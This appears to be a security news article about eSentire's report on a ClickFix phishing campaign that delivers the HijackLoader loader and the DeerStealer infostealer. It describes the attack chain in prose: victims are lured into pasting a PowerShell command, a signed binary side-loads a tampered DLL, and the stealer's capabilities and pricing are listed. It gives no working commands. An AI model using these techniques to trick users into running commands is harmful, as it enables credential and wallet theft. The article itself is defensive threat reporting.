A recent surge in cyber-attacks has been detected by cybersecurity experts, with HijackLoader and DeerStealer being used in phishing campaigns to trick victims into executing harmful commands.
The eSentire’s Threat Response Unit (TRU) uncovered this new tactic, which starts with the use of ClickFix to gain initial access. Victims are directed to a phishing page where they are instructed to run a PowerShell command through the Windows Run prompt. This command triggers the download of an installer named now.msi, setting off a series of actions that ultimately lead to the deployment of HijackLoader and the release of the DeerStealer payload.
HijackLoader, which has been active since 2023, is known for its utilization of steganography, specifically concealing configuration data within PNG images. Once activated, the loader exploits legitimate binaries to execute unsigned malicious code, paving the way for DeerStealer to be injected into memory.
DeerStealer, also known as XFiles Spyware in dark-web circles, is a subscription-based infostealer that offers a wide range of theft capabilities beyond basic credential harvesting. This malware can extract data from over 50 web browsers, intercept 14+ types of cryptocurrency wallets through clipboard monitoring, gather credentials from various messaging platforms, and even provide stealthy remote access through hidden VNC functionality. Additionally, DeerStealer employs encrypted HTTPS channels for command-and-control communication, making detection and analysis more challenging.
The attack involves a series of encoded commands that fetch the installer, utilizing a signed binary from COMODO that loads a manipulated DLL to hijack execution. Despite the availability of tools to decode HijackLoader’s configuration, attackers continue to utilize these methods, highlighting their indifference to detection risks.
eSentire has cautioned that DeerStealer is constantly evolving, with future enhancements set to include MacOS compatibility, AI-driven improvements, and expanded client targets. Threat actors who opt for higher-priced tiers of up to $3000 per month gain access to features such as re-encryption, payload signing, and advanced customization.
In light of these developments, eSentire’s TRU advises organizations to maintain continuous threat monitoring and update their endpoint protection measures to detect emerging loaders and stealers before any harm is inflicted. As cyber threats become more sophisticated, staying vigilant is crucial to safeguarding sensitive data and systems.